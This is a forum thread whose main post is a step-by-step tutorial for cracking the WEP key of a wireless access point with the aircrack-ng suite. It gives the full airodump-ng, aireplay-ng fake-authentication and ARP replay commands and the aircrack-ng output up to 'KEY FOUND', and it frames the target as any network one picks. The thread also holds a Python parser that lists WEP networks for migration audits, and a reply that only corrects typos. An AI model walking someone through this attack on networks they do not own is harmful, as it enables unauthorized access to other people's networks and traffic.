Cracking WEP with the aircrack-ng suite

jacksold
n00b
Posts: 2
Joined: Tue Jul 05, 2016 4:19 am

Post by jacksold » Thu Jul 07, 2016 2:34 am

Prerequisites:
Linux command-line experience
Backtrack 4 R2 or Ubuntu 7.10 + patched WiFi drivers + Aircrack-ng suite
Common sense

The information in this tutorial is for educational and informational purposes only; use it at your own risk. Soldierx.com, its members, crew, and affiliates cannot be held responsible for the misuse of this information.

WEP encryption has been hailed as one of the least secure methods of securing a wireless access point in the history of WiFi, since wireless encryption standards began being developed. The main reason for this is that fragments of the key are sent between a client computer and the access point in 32-bit initialization vectors, commonly referred to as ICVs. Statistically, it has been shown that a certain volume of these have weak encryption and are vulnerable to packet analysis. The number of packets required to crack an access point's key can vary from 200 to 500 thousand for 64- and 128-bit encryption respectively.

***NOTE***
**This tutorial will cover a basic WEP crack.
**It is by no means exhaustive and is meant as
**a jumping-off point; from here I send you to Google,
**the place where I first got my information.
**********

***ALL COMMANDS LISTED IN THIS TUTORIAL ARE BEING RUN FROM THE root ACCOUNT ON THE MACHINE. IF YOU ARE NOT RUNNING BACKTRACK OR YOU BUILT YOUR OWN SYSTEM, YOU NEED TO LOG IN AS ROOT OR sudo EACH COMMAND***

The first step in any cracker's attempt at a WiFi access point is to pick a target. This can be achieved by running airmon-ng to list any and all available network adapters.

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
Then you want to type airodump-ng start (adapter name: ath0, wlan0, wlan1, etc.). What this does is put your wireless adapter into promiscuous or monitor mode, which allows it to accept all traffic and basically grab ARP packets and such out of the air; it also allows the adapter to do what is called packet injection, basically shooting packets into the network to get a response from the access point.

The next command to run is airodump-ng (adapter name: mon0, mon1, eth0, etc.). This will list all available access points and let you choose one. You will want to pick one with the best signal. The way to check for the best signal is to look at the PWR column while the program is running. A strong signal will be a low number preceded by a dash (-), such as -56 or -86. The first example would be the stronger one, as I believe the strength is measured in -dBm, or the power ratio in decibels (dB) of the measured power referenced to one milliwatt, the lower number being stronger as you get more towards a positive output of power.

CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
Once you have selected your target, make note of the BSSID, channel, and the amount of data it receives. Another good indicator of a good access point to crack would be a reasonable amount of data received (80-120 without injection, can be more). You would then run the command airodump-ng -w filename --channel (channel of target) --bssid (BSSID or MAC address of target) (interface to capture on: mon0, eth0, whatever airmon-ng gives you as the monitor-mode interface, typically mon0).

Example:
airodump-ng -w output --channel 9 --bssid 00:14:6C:7E:40:80 ath0
At this stage you would then open a tab in your console window for a separate session and run aireplay-ng -1 0 -a (bssid of target) (interface). This is a fake authentication attack and will give you something like this:
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

if you are successful. Once you have achieved a successful association, you run the injection to gather data. (You want to run this alongside airodump-ng, because airodump-ng captures and dumps packets to a .cap file that you will be running through aircrack-ng.) To set up the attack we will be running this command: aireplay-ng -3 -b (bssid of target) (interface). This command starts an ARP request replay attack, which will stimulate the gathering of the data that you need to crack the access point.
Example:
aireplay-ng -3 -b 00:14:6C:7E:40:80 ath0
You should see this:
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
Open another console window, a third one, and enter aircrack-ng filename.cap. aircrack-ng will attempt a crack with what you have captured, and if it does not succeed it will monitor the amount of data you have received and continue trying to crack the key at regular intervals. Once the crack has succeeded you will know it by a screen that has this:
Aircrack-ng 0.9

[00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%
This screen will let you know that you have successfully cracked the key, and you can copy it down to use or test. You can back up the .cap files to a flash drive and crack at a later date if you lose the key, though if the access point's key changes you may have to crack it again.

This is all that is really needed to know to crack a WEP encrypted access point.

Reference:
http://www.aircrack-ng.org/doku.php?id=simple_wep_crack
just do it
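The airodump-ng listing shown in the tutorial is also what a network owner reads to find out which of their own access points still run WEP and need to be migrated to WPA2/WPA3. What follows is an added example, not code from jacksold's post or from the aircrack-ng project: a small Python parser for that screen layout that pulls out each access point's BSSID, channel, ENC/CIPHER/AUTH and ESSID, then lists the WEP networks strongest-signal first. The sample listing embedded in the code is constructed for this example (the teddy BSSID is the one the tutorial shows; the other rows are made up), and the PWR values are treated as dBm, so -56 ranks above -86.

```python
import re
from typing import Dict, List

# Constructed sample in the airodump-ng screen layout used in the tutorial.
# Apart from the tutorial's teddy row, the MACs and ESSIDs are made up.
SAMPLE_LISTING = """\
 CH  9 ][ Elapsed: 8 mins ][ 2016-07-07 02:34

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:14:6C:7E:40:80  -56 100     5240   178307  338   9  54   WEP  WEP         teddy
 00:1A:2B:3C:4D:5E  -70  90     1200      310    2   6  54   WPA2 CCMP   PSK  office
 00:1A:2B:3C:4D:5F  -86  40      800       12    0  11  54   WEP  WEP         legacy-printer
 00:1A:2B:3C:4D:60  -61  95     3000      100    1   1  54   OPN              guest wifi

 BSSID              STATION            PWR   Lost  Packets  Probes

 00:14:6C:7E:40:80  00:0F:B5:88:AC:82  -56      0   183782
"""

MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")
# Values airodump-ng prints in the AUTH column; used to tell AUTH from ESSID.
AUTH_VALUES = {"PSK", "MGT", "OPN", "SKA"}


def parse_airodump(listing: str) -> List[Dict]:
    """Parse the access-point table of an airodump-ng screen dump.

    Only the first table (one row per BSSID) is parsed; the station table
    that starts at the 'STATION' header is skipped.
    """
    networks = []
    for raw in listing.splitlines():
        fields = raw.split()
        if "STATION" in fields:
            break                      # station table begins; we are done
        if len(fields) < 9 or not MAC_RE.match(fields[0]):
            continue                   # banner, header or blank line
        bssid, pwr, _rxq, _beacons, data, _per_s, ch, _mb, enc = fields[:9]
        rest = fields[9:]              # CIPHER [AUTH] ESSID..., each optional
        cipher = auth = ""
        if enc != "OPN" and rest:      # open networks print no cipher
            cipher = rest.pop(0)
        if rest and rest[0] in AUTH_VALUES:
            auth = rest.pop(0)         # an ESSID literally named "PSK" would fool this
        networks.append({
            "bssid": bssid,
            "pwr_dbm": int(pwr),
            "data_frames": int(data),
            "channel": int(ch),
            "enc": enc,
            "cipher": cipher,
            "auth": auth,
            "essid": " ".join(rest),   # ESSIDs may contain spaces
        })
    return networks


def find_wep_networks(listing: str) -> List[Dict]:
    """Return the WEP networks, strongest signal first.

    PWR is in dBm, so a value closer to zero (-56) is a stronger signal than
    one further from it (-86); sorting descending puts the strongest first.
    """
    wep = [n for n in parse_airodump(listing) if n["enc"] == "WEP"]
    return sorted(wep, key=lambda n: n["pwr_dbm"], reverse=True)


def report(listing: str) -> str:
    """One line per WEP network, suitable for a migration checklist."""
    lines = []
    for n in find_wep_networks(listing):
        lines.append(f"{n['bssid']}  ch {n['channel']:>2}  {n['pwr_dbm']:>4} dBm  "
                     f"{n['data_frames']:>7} data frames  ESSID={n['essid']!r}")
    return "\n".join(lines) if lines else "no WEP networks found"


if __name__ == "__main__":
    print(report(SAMPLE_LISTING))
```

The parser stops at the STATION header on purpose: station rows also begin with a MAC address, and treating them as access points would invent networks that do not exist. Feed it a saved screen dump (or a listing captured with script) rather than the live curses display.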

Cool_Fire
Not a sandwich
Posts: 1912
Joined: Fri May 09, 2003 1:20 pm
Location: 41 6d 73 74 65 72 64 61 6d

Re: Cracking WEP with the aircrack-ng suite

Post by Cool_Fire » Sat Jul 09, 2016 3:29 pm

Nice writeup.

A few quick remarks before it can be moved into the tutorial section:
jacksold wrote: The information in this tutorial is for educational and informational purposes only, use it at your own risk. Soldierx.com, it's members, crew, and affiliates cannot be held responsible for the misuse of this information.
Who or what is Soldierx.com and why would they be liable for anything published on hackerthreads.org?
jacksold wrote: ***ALL COMMANDS LISTED IN THIS TUTORIAL ARE BING RUN FROM THE root ACCOUNT ON THE MACHINE, IF YOU ARE NOT RUNNING BACKTRACK OR YOU BUILT YOUR OWN SYSTEM YOU NEED TO LOG IN AS ROOT OR sudo EACH COMMAND***
BING => BEING
jacksold wrote: this screen will let you know that you have successfully cracked the key and you can copy it down to use or test. you cn backup the .cap files to a flash drive and crack at a later date if you lose the key. though if the access point's key changes you may have to crack it again.
cn => can

I'd also suggest using

    code blocks like these

for commands/output. It makes it a lot clearer and preserves output formatting.
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!
Hackerthreads chat, where the party is going 24/7.
